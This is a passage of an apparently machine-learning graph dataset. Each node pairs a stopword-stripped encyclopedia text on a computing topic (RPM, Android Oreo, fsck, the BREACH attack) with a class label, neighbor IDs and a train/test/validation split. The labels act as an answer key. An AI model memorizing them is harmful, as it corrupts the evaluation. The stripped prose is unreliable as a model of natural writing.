10.13 later released january 23 2018 version 5.5 macos server operates macos high sierra 10.13.3 later released april 24 2018 version 5.6 macos server operates macos high sierra 10.13.5 later released september 28 2018 version 5.7 macos server operates macos mojave 10.14 later version apple stopped bundling open source services calendar server contacts server mail server dns dhcp vpn server websites macos server included services limited profile manager open directory xsan released march 25 2019 version 5.8 macos server operates macos mojave 10.14 later profile manager supports new restrictions payloads commands file print services directory services authentication mail services calendaring web hosting collaboration services application servers media streaming client management networking vpn distributed computing high-availability features file systems management features macos server available english japanese french german simplified chinese dutch italian korean spanish traditional chinese",
    "neighbors": [
      10755,
      9732,
      4615,
      1549,
      5647,
      7697,
      1042,
      4114,
      11289,
      9245,
      6186,
      6700,
      4657,
      1074,
      8754,
      9784,
      7739,
      8253,
      8767,
      576,
      8774,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      4184,
      10838,
      9308,
      2141,
      4702,
      3167,
      7261,
      3681,
      9826,
      2149,
      5733,
      8806,
      10341,
      10344,
      3691,
      8303,
      8304,
      6771,
      2676,
      9335,
      6264,
      7292,
      2686,
      6783,
      7806,
      9343,
      10878,
      2179,
      2695,
      3719,
      10888,
      8842,
      7307,
      11402,
      6797,
      2193,
      8852,
      1686,
      7318,
      5784,
      1177,
      4251,
      3228,
      2207,
      1699,
      11430,
      168,
      3241,
      8360,
      171,
      5292,
      8877,
      1710,
      2735,
      3248,
      9909,
      3766,
      2232,
      9912,
      4283,
      7869,
      9406,
      1729,
      6849,
      7364,
      4294,
      6855,
      7163,
      713,
      9418,
      3790,
      7378,
      8404,
      3286,
      9430,
      3289,
      3293,
      4318,
      225,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      5356,
      2288,
      5363,
      10486,
      7928,
      1273,
      8441,
      11513,
      7422,
      11521,
      2819,
      1796,
      5380,
      7430,
      11011,
      1290,
      9487,
      784,
      9999,
      10512,
      5397,
      4888,
      11037,
      8998,
      10023,
      811,
      3371,
      4399,
      7983,
      10036,
      7991,
      9529,
      2363,
      7483,
      2365,
      2366,
      9022,
      1346,
      1859,
      10052,
      4933,
      838,
      2887,
      10562,
      10058,
      9035,
      1363,
      2388,
      1878,
      8539,
      6495,
      865,
      866,
      9063,
      4457,
      8554,
      10602,
      3948,
      11629,
      7022,
      10608,
      5492,
      3450,
      8582,
      6023,
      7049,
      7561,
      6539,
      9100,
      1422,
      7057,
      1428,
      9109,
      3483,
      1439,
      929,
      2979,
      9123,
      11171,
      11173,
      8109,
      11184,
      2492,
      446,
      7614,
      8644,
      2502,
      456,
      1482,
      6093,
      7118,
      464,
      6608,
      6098,
      4053,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      4068,
      487,
      2023,
      8170,
      10221,
      7154,
      5619,
      11257,
      6651,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 5094,
    "label": 3,
    "text": "Byte_addressing:byte addressing byte addressing refers hardware architectures support accessing individual bytes data rather larger units called words would word-addressable computers sometimes called byte machines contrast word machines basic unit digital storage called bit storing single 0 1 many common architectures address 8 bits data time example intel 386sx processor handle 16-bit two-byte data since data transferred 16-bit bus however data memory may various lengths 64-bit architecture machine might still need access 8-bit data 64-bit address line data returned bottom 8 bits longer data line byte addressable memory refers architectures data accessed addressed units narrower bus eight-bit processor like intel 8008 addresses eight bits full width bus regarded word-addressable 386sx addresses memory 8-bit units fetch store 16 bits time termed byte-addressable bytes always meant 8 bits fact depending platform byte sizes 1 48 bits used past therefore term octet used context makes byte-length ambiguous example 1980s honeywell mainframes 36-bit words byte-addressable 9-bit bytes nonets used 7- 8-bit character codes either stored one 9-bit byte making characters individually addressable illustrate byte addressing useful consider ibm 7094 word-addressable concept byte 36-bit words stores six-bit character codes six word change 16th character string program determine fourth character third word string fetch third word mask old value fourth character value held register new one store back amended word least six machine instructions usually relegated subroutine every store fetch single character involves overhead calling subroutine returning byte addressing achieved one instruction store character code byte address text programs easier write smaller run faster advantage word addressing memory addressed number bits ibm 7094 15-bit addresses could address 32,768 words 36 bits machines often built full complement addressable memory addressing 32,768 bytes 6 bits would much less useful scientific engineering users consider 32-bit pentium processor 32-bit address bus address 4 billion different items using word addressing 32-bit address bus could address 4 gigawords 16 gigabytes using modern 8-bit byte 386sx successors used word addressing scientists engineers gamers could enjoyed programs 4x larger 32-bit machines word processing rendering html text applications would run slowly computers costly mainly used science engineering word addressing obvious mode became cost-effective use computers handling text hardware designers moved byte addressing systems pdp-10 use word addressing facilitate access individual bytes using special instructions access memory using byte pointer contains word address index specific byte within word",
    "neighbors": [
      1462,
      7607,
      8474,
      1469,
      7071
    ],
    "mask": "Test"
  },
  {
    "node_id": 5095,
    "label": 2,
    "text": "GNOME_Mobile_&_Embedded_Initiative:gnome mobile amp embedded initiative gnome mobile embedded initiative gmae also known gnome mobile initiative developing promoting use gnome platform mobile devices announced embedded linux conference santa clara california april 19 2007 gnome mobile strips deprecated components desktop backward compatibility adds mobile-specific components like matchbox window manager window manager optimized mobile integrated devices gnome mobile uses optimizes mainline codebase used desktop merely scaling design smaller form factor",
    "neighbors": [
      1537,
      11394,
      2955,
      6413,
      10255,
      8848,
      3859,
      7450,
      1822,
      6691,
      6694,
      4011,
      8621,
      9908,
      10945,
      708,
      3015,
      4177,
      3300,
      3561,
      4459,
      6763,
      9455
    ],
    "mask": "None"
  },
  {
    "node_id": 5096,
    "label": 2,
    "text": "RPM_Package_Manager:rpm package manager rpm package manager rpm originally red hat package manager recursive acronym free open-source package management system name rpm refers file format package manager program rpm intended primarily linux distributions file format baseline package format linux standard base although created use red hat linux rpm used many linux distributions also ported operating systems novell netware version 6.5 sp3 ibm aix version 4 centos fedora fedora project also sponsored red hat oracle linux versions variants linux operating systems use rpm package manager rpm package contain arbitrary set files rpm files “ binary rpms ” brpms containing compiled version software also “ source rpms ” srpms containing source code used build binary package appropriate tag file header distinguishes normal b rpms causing extracted /usr/src installation srpms customarily carry file extension “ .src.rpm ” .spm file systems limited 3 extension characters e.g old dos fat rpm originally written 1997 erik troan marc ewing based experiences system administrator performing software installation maintenance use package management rather manual building advantages simplicity consistency ability processes automated non-interactive features rpm include packages may come within particular distribution example red hat enterprise linux built parties example rpm fusion fedora circular dependencies among mutually dependent rpms so-called dependency hell problematic cases single installation command needs specify relevant packages rpms often collected centrally one repositories internet site often rpm repositories may either act local mirrors internet repositories locally maintained collections useful rpms several front-ends rpm ease process obtaining installing rpms repositories help resolving dependencies include working behind scenes package manager rpm database stored uses berkeley db back-end consists single database containing meta information installed rpms multiple databases created indexing purposes replicating data speed queries database used keep track files changed created user using rpm installs package thus enabling user via rpm reverse changes remove package later database gets corrupted possible rpm client killed index databases recreated command whilst rpm format across different linux distributions detailed conventions guidelines may vary across rpm delivered single file normally filename format example package filename associated source package would named rpms extension depend particular cpu architecture example rpms may contain graphics text programs use may also contain shell scripts programs written interpreted programming languages python rpm contents also include package label contains following pieces information package label fields need match filename libraries distributed two separate packages version one contains precompiled code use run-time second one contains related development files headers etc packages -devel appended name field system administrator ensure versions binary development packages match format binary consists four sections recipe creating rpm package spec file spec files end .spec suffix contain package name version rpm revision number steps build install clean package changelog multiple packages built single rpm spec file desired rpm packages created rpm spec files using rpmbuild tool spec files usually distributed within srpm files contain spec file packaged along source code typical rpm pre-compiled software ready direct installation corresponding source code also distributed done srpm also includes spec file describing software built srpm also allows user compile perhaps modify code software package could contain platform independent scripts case developer could provide srpm still installable rpm special version srpm contains spec file optionally patches include sources usually license two versions rpm development one led fedora project red hat separate group led previous maintainer rpm former employee red hat rpm.org community first major code revision july 2007 version 4.8 released january 2010 version 4.9 march 2011 4.10 may 2012 4.11 january 2013 4.12 september 2014 4.13 july 2015 version used distributions fedora red hat enterprise linux derivatives opensuse suse linux enterprise unity linux mageia openembedded tizen openmandriva lx formerly mandriva jeff johnson rpm maintainer since 1999 continued development efforts together participants several distributions rpm version 5 released may 2007 version used distributions wind river linux wind river linux 10 rosa linux openmandriva lx former mandriva linux switched rpm5 2011 also openpkg project provides packages common unix-platforms openmandriva lx going switch back rpm.org 4.0 release openembedded last major user rpm5 switched back rpm.org due issues rpm5",
    "neighbors": [
      2050,
      10760,
      7181,
      1553,
      8213,
      5656,
      6680,
      5670,
      3114,
      2095,
      561,
      3129,
      1594,
      3131,
      5179,
      3649,
      10817,
      5705,
      3147,
      3659,
      10317,
      4174,
      3667,
      6227,
      3162,
      4186,
      5723,
      10857,
      9324,
      5742,
      6257,
      1138,
      4729,
      7293,
      9353,
      10387,
      10900,
      3222,
      4775,
      7847,
      6828,
      7855,
      4282,
      5819,
      190,
      2755,
      4296,
      2762,
      3791,
      10961,
      722,
      5335,
      6361,
      3804,
      9953,
      741,
      231,
      8940,
      237,
      4845,
      9455,
      7920,
      6393,
      6910,
      7938,
      9988,
      11525,
      2310,
      7435,
      7947,
      9997,
      9487,
      8467,
      788,
      1813,
      5397,
      8476,
      5923,
      10022,
      6446,
      7983,
      1842,
      4406,
      823,
      2872,
      3387,
      11076,
      3918,
      10575,
      2389,
      4951,
      8539,
      9564,
      2401,
      4961,
      1379,
      5988,
      9063,
      4459,
      6508,
      10096,
      2417,
      11643,
      6525,
      10623,
      11135,
      8067,
      8582,
      2955,
      4493,
      2448,
      1940,
      2967,
      10138,
      2974,
      6055,
      1455,
      11184,
      6583,
      10172,
      9671,
      5067,
      463,
      4561,
      6100,
      2010,
      6620,
      7140,
      6119,
      5612,
      1007,
      1522,
      2045,
      3582,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 5097,
    "label": 9,
    "text": "Gunther_Schmidt:gunther schmidt gunther schmidt born 1939 rüdersdorf german mathematician works also informatics schmidt began studying mathematics 1957 göttingen university studying carl ludwig siegel returned göttingen spending time united states wwii 1960 transferred ludwig-maximilians-universität münchen studied functions several complex variables karl stein schmidt wrote thesis analytic continuation functions 1962 schmidt began work tu münchen students robert sauer beginning labs tutorials later mentoring administration schmidt interests turned toward programming collaborated hans langmaack rewriting braid group 1969 friedrich l. bauer klaus samelson establishing software engineering university schmidt joined group 1974 1977 submitted habilitation programs partial graphs became professor 1980 shortly appointed hold chair late klaus samelson one half years 1988 retirement 2004 held professorship faculty computer science universität der bundeswehr münchen classroom instructor beginners courses well special courses mathematical logic semantics programming languages construction compilers algorithmic languages working thomas strohlein authored textbook relations graphs published german 1989 english 1993 2012 2001 became involved large project 17 nations european cooperation science technology schmidt chairman project cost 274 tarski theory application relational structures knowledge instruments 2014 festschrift organized celebrate 75th year calculus relations relatively low profile among mathematical topics twentieth century schmidt others raised profile partial order binary relations organized grouping closure 2018 schmidt michael winter published relational topology reviews classical mathematical structures binary operations topological space lens calculus relations 1981 participated international summer school marktoberdorf edited lecture notes theoretical foundations programming methodology manfred broy gunther schmidt mainly known work relational mathematics co-founder ramics conference series 1994 textbooks calculus relations exhibit applications potential algebraic logic",
    "neighbors": [
      512,
      1952,
      8262,
      4395,
      1392,
      1783,
      5496
    ],
    "mask": "Test"
  },
  {
    "node_id": 5098,
    "label": 0,
    "text": "Paper_generator:paper generator paper generator computer software composes scholarly papers style appear academic journals conference proceedings typically generator uses technical jargon field compose sentences grammatically correct seem erudite actually nonsensical prose supported tables figures references may valid randomly inserted rather relevant examples include postmodernism generator snarxiv scigen latter used generate many computer science papers accepted publication",
    "neighbors": [
      1652,
      5278,
      10591
    ],
    "mask": "Test"
  },
  {
    "node_id": 5099,
    "label": 1,
    "text": "Malta_Maritime_Authority:malta maritime authority malta maritime authority mma awtorità marittima ta malta used independent state corporation government agency responsible governance operation regulation promotion ports mediterranean archipelago nation malta operation principal cargo port malta freeport done conjunction malta freeport terminals company established 1988 malta smaller ports provide service pleasure craft yacht marinas ferry services fishing industry local trade mma ports directorate port authority ports malta malta international ship register department mma 2010 mma longer exists separate entity forms part transport malta governmental institution encompasses transport control islands sea land air malta rich maritime heritage principal ports include",
    "neighbors": [
      6461
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5100,
    "label": 2,
    "text": "Android_Oreo:android oreo android oreo codenamed android development eighth major release 15th version android mobile operating system first released alpha quality developer preview march 2017 released public august 21 2017 contains number major features including notification grouping picture-in-picture support video performance improvements battery usage optimization support autofillers bluetooth 5 system-level integration voip apps wide color gamuts wi-fi aware android oreo also introduces two major platform features android go – software distribution operating system low-end devices – support implementing hardware abstraction layer 28.3 android devices run oreo 12.9 8.0 15.4 8.1 making oreo major release commonly used version android android oreo internally codenamed oatmeal cookie march 21 2017 google released first developer preview android available nexus 5x nexus 6p nexus player pixel c pixel smartphones second considered beta quality released may 17 2017 third developer preview released june 8 2017 offered finalized version api dp3 finalized release api api level 26 changed camera ui reverted wi-fi cellular connectivity levels status bar back wi-fi left added themed notifications added battery animation settings battery new icon darker background clock app teardrop icon shape apps july 24 2017 fourth developer preview released included final system behaviors latest bug fixes optimizations android officially released august 21 2017 name oreo lawn statue unveiled promotional event across chelsea market new york city—a building formerly housed nabisco factory oreo cookies first produced factory images made available compatible pixel nexus devices later day sony xperia xz1 sony xperia xz1 compact first devices available oreo pre-installed android 8.1 released december 2017 pixel nexus devices features minor bug fixes user interface changes notifications snoozed batched topic-based groups known channels 'major ongoing feature orders alerts priority pinning important application top slot android oreo contains integrated support picture-in-picture modes supported youtube app youtube premium subscribers settings app features new design white theme deeper categorization different settings ringtone alarm notification sound settings contain option adding custom sounds list android 8.1 update supports display battery percentages connected bluetooth devices makes notification shade slightly translucent dims on-screen navigation keys order reduce possibility burn-in android oreo adds support neighborhood aware networking nan wi-fi based wi-fi aware bluetooth 5 wide color gamuts apps api autofillers multiprocess google browsing support webviews api allow system-level integration voip apps launching activities remote displays android runtime art features performance improvements android oreo contains additional limits apps background activities order improve battery life apps specify adaptive icons differently-shaped containers specified themes circles squares squircles android oreo supports new emoji included unicode 10 standard new emoji font also introduced notably redesigns face figures use traditional circular shape opposed blob design introduced kitkat underlying architecture android revised low-level vendor-specific code supporting device hardware separated android os framework using hardware abstraction layer known vendor interface vendor interfaces must made forward compatible future versions android new architecture called project treble allows quicker development deployment android updates devices vendors would need make necessary modifications bundled software devices shipping oreo must support vendor interface feature optional devices updated oreo earlier version seamless updates system introduced android 7.0 also modified download update files directly system partition rather requiring downloaded user partition first reduces storage space requirements system updates android oreo introduces new automatic repair system known rescue party operating system detects core system components persistently crashing startup automatically perform series escalating repair steps automatic repair steps exhausted device reboot recovery mode offer perform factory reset android 8.1 update also introduces neural network api designed provide apps hardware acceleration on-device machine learning operations api designed use machine learning platforms tensorflow lite specialized co-processors pixel visual core featured google pixel 2 smartphones dormant 8.1 installed also provides cpu fallback mode tailored distribution low-end devices known android go unveiled oreo intended devices 1 gb ram less mode platform optimizations designed reduce mobile data usage including enabling data saver mode default special suite google mobile services designed less resource- bandwidth-intensive google play store also highlight lightweight apps suited devices operating system interface also modified quick settings panel providing greater prominence information regarding battery mobile data limit available storage recent apps menu using modified layout limited four apps order reduce ram consumption api allowing mobile carriers implement data tracking top-ups within android settings menu google play services also modularized reduce memory footprint android go made available oems android 8.1 android oreo re-brands automatic scanning google play store sideloaded apps google play protect gives feature well find device formerly android device manager higher prominence security menu settings app opposed single system-wide setting enabling installation apps sources outside google play store function implemented permission granted individual apps i.e clients third-party app repositories amazon appstore f-droid verified boot includes rollback protection feature enforces restriction rolling back device previous version android aimed preventing potential thief bypassing security measures installing previous version operating system n't place",
    "neighbors": [
      5637,
      11273,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      7722,
      10284,
      5677,
      8754,
      10293,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      4890,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      9115,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      2001,
      479,
      488,
      6632,
      1516,
      5613,
      6128,
      9712,
      5620,
      11252,
      8698,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5101,
    "label": 9,
    "text": "Comparison_of_JavaScript_engines_(DOM_support):comparison javascript engines dom support following tables compare document object model dom compatibility support number javascript engines used web browsers features fully supported based dom level 2 dom level 3 modules w3c recommendation exact version number given certain feature added version dom level 0 dom level 3 modules still development included see list ecmascript engines full list interfaces within section considered fundamental must fully implemented conforming implementations dom including html dom implementations interfaces defined form part dom core specification objects expose interfaces never encountered dom implementation deals html interfaces found within section mandatory section extends dom core api describe objects methods specific html documents xhtml documents general functionality needed manipulate hierarchical document structures elements attributes found core section functionality depends specific elements defined html found section elements deprecated since html 4.01 listed elements attributes listed deprecated xhtml 1.1 example presentation attributes image maps frames targets interfaces found within section mandatory interfaces section base interfaces used represent type style sheet interfaces within section considered fundamental css interfaces must supported conforming implementations css module interfaces represent css style sheets specifically interfaces found within section mandatory interfaces found within section mandatory first goal design generic event system allows registration event handlers describes event flow tree structure provides basic contextual information event second goal event model provide common subset current event systems used dom level 0 browsers see also dom events details interfaces found within section mandatory document may one views associated e.g. computed view document applying css stylesheet multiple presentations e.g html frame document client view alternate representation presentation associated source document interfaces found within section mandatory interfaces provide easy-to-use robust selective traversal document contents interfaces found within section mandatory includes methods creating moving range methods manipulating content ranges interfaces within section considered fundamental must fully implemented conforming implementations dom load save module interfaces found within section mandatory module provides interfaces guide construction editing xml documents examples guided editing queries like combine questions like schema allow insert/delete insert/delete document still valid",
    "neighbors": [
      8068,
      3462,
      6791,
      1802,
      6154,
      8605,
      6176,
      1698,
      5031,
      1203,
      438,
      4920,
      1470,
      7871,
      5311,
      5067,
      3407,
      339,
      11223,
      4056,
      9560,
      9561,
      8923,
      8289,
      482,
      487,
      9195,
      10991,
      10739,
      10744
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5102,
    "label": 5,
    "text": "IP_over_Avian_Carriers:ip avian carriers computer networking ip avian carriers ipoac proposal carry internet protocol ip traffic birds homing pigeons ip avian carriers initially described rfc 1149 request comments rfc issued internet engineering task force ietf written d. waitzman released april 1 1990 one several april fools day request comments waitzman described improvement protocol rfc 2549 ip avian carriers quality service 1 april 1999 later rfc 6214—released 1 april 2011 13 years introduction ipv6—carpenter hinden published adaptation rfc 1149 ipv6 ipoac successfully implemented nine packets data packet loss ratio 55 due operator error response time ranging 3,000 seconds ≈54 minutes 6,000 seconds ≈1.77 hours thus technology suffers poor latency nevertheless large transfers avian carriers capable high average throughput carrying flash memory devices effectively implementing sneakernet last 20 years information density storage media thus bandwidth avian carrier increased 3 times fast bandwidth internet ipoac may achieve bandwidth peaks orders magnitude internet used multiple avian carriers rural areas example 16 homing pigeons given eight 512 gb sd cards take hour reach destination throughput transfer would 145.6 gbit/s excluding transfer sd cards 28 april 2001 ipoac actually implemented bergen linux user group name cpip carrier pigeon internet protocol sent nine packets distance approximately five kilometers three miles carried individual pigeon containing one ping icmp echo request received four responses real life implementation mentioned french mp martine billard french assemblée nationale debates hadopi implementation noted song paper pings steve savitzky december 2005 gartner report bird flu concluded “ pandemic would n't affect systems directly ” humorously criticized neglecting consider rfc 1149 rfc 2549 analysis although collisions unlikely packets lost particularly raptors rafting photographers already use pigeons sneakernet transport digital photos flash media camera tour operator 30-mile distance single pigeon may able carry tens gigabytes data around hour average bandwidth basis compares favorably current adsl standards even accounting lost drives march 12 2004 yossi vardi ami ben-bassat guy vardi sent 3 homing pigeons 100 km distance carrying 20-22 tiny memory cards msystems disk-on-chip containing 1.3 gb amounting total 4 gb data achieving effective throughput 2.27 mbps purpose test measure confirm improvement rfc 2549 since developers used flash memory instead paper notes specified rfc 2549 experiment widely criticized example optimized implementation breaks official standard inspired rfc 2549 9 september 2009 marketing team unlimited regional company south africa decided host tongue-in-cheek pigeon race pet pigeon winston local telecom company telkom sa race send 4 gigabytes data howick hillcrest approximately 60 km apart pigeon carried microsd card competed telkom adsl line winston beat data transfer telkom adsl line total time two hours six minutes 57 seconds uploading data microsd card completion download card time winston victory adsl transfer 4 complete november 2009 australian comedy/current-affairs television program hungry beast repeated experiment hungry beast team took challenge fiery parliament session wherein government time blasted opposition supporting telecommunications investments saying opposition way australians would data transfer carrier pigeons hungry beast team read south african experiment assumed developed western country australia would higher speeds experiment team transfer 700mb file via three delivery methods determine fastest carrier pigeon microsd card car carrying usb stick telstra australia largest telecom provider adsl line data transferred tarana rural new south wales western-sydney suburb prospect new south wales distance 132 km road approximately halfway race internet connection unexpectedly dropped transfer restarted pigeon race time approximately 1 hour 5 minutes car came second 2 hours 10 minutes internet transfer finish dropped second time coming back estimated time upload completion one point high 9 hours point estimated upload time fall 4 hours similar pigeon race conducted september 2010 tech blogger trefor.net isp timico cto trefor davies farmer michelle brumfield rural yorkshire england delivering five-minute video bbc correspondent 75 miles away skegness pigeon pitted carrying memory card 300mb hd video davies haircut upload youtube via british telecom broadband pigeon released 11.05 arrived loft one hour fifteen minutes later upload still incomplete failed interim",
    "neighbors": [
      3592,
      3218,
      11413,
      5531,
      3742,
      1315,
      10924,
      6319,
      562,
      6456,
      4797,
      4158,
      3006,
      64,
      7364,
      2887,
      5469,
      5470,
      5472,
      10341,
      10344,
      11112,
      8432,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 5103,
    "label": 2,
    "text": "Windows_Embedded_Compact_7:windows embedded compact 7 windows embedded compact 7 formerly known windows embedded ce 7.0 seventh major release windows embedded ce operating system windows embedded compact 7 real-time os separate windows nt line designed target enterprise specific tools industrial controllers consumer electronics devices digital cameras gps systems also automotive infotainment systems windows embedded compact designed run multiple cpu architectures supports x86 sh automotive arm development microsoft employee working division claimed microsoft working hard release shares underlying kernel windows phone microsoft officially confirmed said windows phone 7 based windows embedded ce 6.0 r3 features borrowed windows embedded compact 7 thus making hybrid solution windows embedded compact 7 released march 1 2011 windows embedded compact 7 contains features",
    "neighbors": [
      8576,
      641,
      3463,
      3978,
      651,
      6797,
      8080,
      3857,
      1298,
      7057,
      2196,
      8976,
      9366,
      10896,
      11283,
      4505,
      4515,
      11301,
      3496,
      6441,
      6697,
      1581,
      7983,
      3250,
      3890,
      10675,
      9910,
      6462,
      7615,
      321,
      7106,
      7234,
      582,
      1098,
      10957,
      5454,
      9173,
      11605,
      2391,
      3289,
      4316,
      8798,
      10079,
      5600,
      11103,
      10338,
      2919,
      488,
      5225,
      4074,
      8296,
      8299,
      9448,
      9964,
      10989,
      1136,
      499,
      5363,
      7796,
      6265,
      8315,
      636,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 5104,
    "label": 2,
    "text": "DataReader:datareader ado.net datareader broad category objects used sequentially read data data source datareaders provide efficient way access data thought firehose cursor asp classic except server-side cursor used datareader parses tabular data stream microsoft sql server methods retrieving data sources datareader usually accompanied command object contains query optionally parameters connection object run query datareader class ado.net number classes implement idatareader interface datareaders small footprint good performance tailor-made task hand however makes difficult write application moved one backend data source another provider-specific datareaders expose types used underlying database example values null microsoft sql server .net framework prior version 2.0 using datareader retrieve data developer choose read field values strongly typed manner example weakly typed manner returning example approaches pros cons using strongly typed retrieval methods cumbersome especially without specific knowledge underlying data numeric values database translate several .net types trying retrieve value using wrong type results exception thrown stops code running slows application also true use right type encounter value avoided using boolean function datareader class benefit retrieval method data validation performed sooner improving probability data correction possible weakly typed data retrieval allows quick code writing allows data used fashion developer n't know beforehand types returned effort programmer extract value variable proper type using methods datareader datareader cases used place datatable however many programmers experienced connection bloat following approach datareader used already open database connection connection n't closed datareader method called exception thrown data processed example described strong weak typing method never called developer writes code explicitly declaring disposing datareader without use block c construct good way avoid problem shown code example sample accessing sql data using datareader",
    "neighbors": [
      736,
      9348,
      4135,
      2669,
      9263,
      3573,
      11030
    ],
    "mask": "None"
  },
  {
    "node_id": 5105,
    "label": 2,
    "text": "KernelCare:kernelcare kernelcare live kernel patching service provides security patches bugfixes range popular linux kernels installed without rebooting system kernelcare software released gpl2 first beta introduced march 2014 commercially launched may 2014 kernelcare supports centos/rhel 5.x 6.x 7.x cloudlinux 5.x 6.x 7.x parallels cloud server oracle linux/rhel 6.x 7.x amazon linux virtuozzo openvz rhel6/rhel proxmox 3.x 4.x 5.x virt-sig/xen4centos debian 6.x 7.x 8.x 9.x ubuntu 14.04 lts 16.04 lts 18.04 lts kernelcare agent resides user server periodically checks kernelcare distribution servers new patches available currently running kernel kernelcare agent downloads applies patches running kernel kernelcare patch piece code used substitute vulnerable buggy code kernel arbitrary code line modification missing security check set functions even modified data structures patch compiled usual generated code additional information changed code pieces caused original source code modification information apply code pieces resulting code modifications safely applied running kernel special kernelcare kernel module applies patches loads patches kernel address space sets relocations i.e. fixes references original kernel code data safely switches execution path original code updated code blocks code ensures patch applied safely cpu n't execute original code blocks moment switching new version",
    "neighbors": [
      4616,
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      4637,
      10785,
      9762,
      6180,
      5158,
      7217,
      8242,
      9266,
      9784,
      10809,
      576,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      10333,
      97,
      6244,
      5222,
      10856,
      8298,
      4207,
      7285,
      9335,
      2168,
      1147,
      5244,
      3197,
      4734,
      1150,
      11391,
      2179,
      7812,
      10883,
      6797,
      4238,
      7821,
      10382,
      2195,
      9366,
      2711,
      6296,
      6808,
      9882,
      7325,
      1694,
      9887,
      2723,
      8364,
      3248,
      6837,
      10933,
      5815,
      5822,
      5824,
      8388,
      1736,
      2762,
      9932,
      8909,
      5840,
      6352,
      7382,
      8410,
      10971,
      4831,
      8928,
      1761,
      1253,
      2278,
      233,
      7403,
      10482,
      5363,
      2294,
      8439,
      2809,
      2811,
      10499,
      4360,
      1291,
      1804,
      4367,
      273,
      11539,
      792,
      10016,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      11075,
      3911,
      4423,
      6988,
      10063,
      5457,
      11601,
      5975,
      11095,
      10590,
      8551,
      10091,
      5492,
      7540,
      8573,
      1406,
      8066,
      900,
      5000,
      394,
      3978,
      5514,
      4493,
      7057,
      11667,
      9621,
      1431,
      8602,
      10138,
      8092,
      11678,
      7584,
      1444,
      421,
      1445,
      935,
      9637,
      4521,
      4011,
      1456,
      11184,
      1972,
      6075,
      6078,
      9151,
      9667,
      8136,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      6128,
      5619,
      2036,
      5620,
      8186,
      10235,
      2044
    ],
    "mask": "Train"
  },
  {
    "node_id": 5106,
    "label": 6,
    "text": "Fsck:fsck system utility fsck file system consistency check tool checking consistency file system unix unix-like operating systems linux macos freebsd similar command chkdsk exists microsoft windows ancestor ms-dos agreed pronunciation pronounced f-s-c-k f-s-check fizz-check f-sack fisk fizik f-sick f-sock f-sek feshk sibilant fsk fix farsk fusk generally fsck run either automatically boot time manually system administrator command works directly data structures stored disk internal specific particular file system use fsck command tailored file system generally required exact behaviors various fsck implementations vary typically follow common order internal operations provide common command-line interface user fsck utilities provide options either interactively repairing damaged file systems user must decide fix specific problems automatically deciding fix specific problems user answer questions reviewing problems need resolved file system without actually fixing partially recovered files original file name reconstructed typically recovered lost+found directory stored root file system system administrator also run fsck manually believe problem file system file system normally checked unmounted mounted read-only system special maintenance mode modern journaling file systems designed tools fsck need run unclean shutdown i.e crash ufs2 file system freebsd background fsck usually necessary wait fsck finish accessing disk full copy-on-write file systems zfs btrfs designed avoid causes corruption traditional fsck repair tool scrub utility examines repairs problems background mounted file system equivalent programs microsoft windows ms-dos chkdsk scandisk severity file system corruption led terms fsck fscked becoming used among unix system administrators minced oath fuck fucked unclear whether usage cause effect report question answer session usenix 1998 claims fsck originally different name go fsck occasionally used online injunction person go correct issue attitude ignorance subject matter etc way running fsck involves fixing fundamental errors following example checks file system configured mounted /usr partition file system needs unmounted first following example checks linux jfs file system mdadm software raid device",
    "neighbors": [
      5120,
      515,
      9733,
      9735,
      3976,
      6797,
      4750,
      6416,
      2194,
      5397,
      2198,
      3350,
      2199,
      6812,
      287,
      9343,
      9762,
      6947,
      10405,
      7847,
      5032,
      4398,
      7983,
      823,
      1336,
      9016,
      7356,
      8772,
      965,
      8266,
      3659,
      8395,
      8522,
      8651,
      9166,
      10967,
      9946,
      2395,
      7136,
      5985,
      6369,
      10851,
      6120,
      491,
      10732,
      4850,
      8306,
      5492,
      9204,
      246,
      9335,
      6138,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 5107,
    "label": 4,
    "text": "BREACH:breach breach backronym browser reconnaissance exfiltration via adaptive compression hypertext security exploit https using http compression breach built based crime security exploit breach announced august 2013 black hat conference security researchers angelo prado neal harris yoel gluck idea discussed community announcement crime attack presented general attack could work effectively large number protocols exploits spdy request compression tls compression demonstrated largely mitigated browsers servers crime exploit http compression mitigated even though authors crime warned vulnerability might even widespread spdy tls compression combined breach instance crime attack http compression—the use gzip deflate data compression algorithms via content-encoding option within http many web browsers servers given compression oracle rest breach attack follows general lines crime exploit performing initial blind brute-force search guess bytes followed divide-and-conquer search expand correct guess arbitrarily large amount content breach exploits compression underlying http protocol therefore turning tls compression makes difference breach still perform chosen-plaintext attack http payload result clients servers either forced disable http compression completely thus reducing performance adopt workarounds try foil breach individual attack scenarios using cross-site request forgery csrf protection another suggested approach disable http compression whenever referrer header indicates cross-site request header present approach allows effective mitigation attack without losing functionality incurring performance penalty affected requests around 2013-2014 ietf draft proposal tls extension length-hiding padding theory could used mitigation attack allows actual length tls payload disguised insertion padding 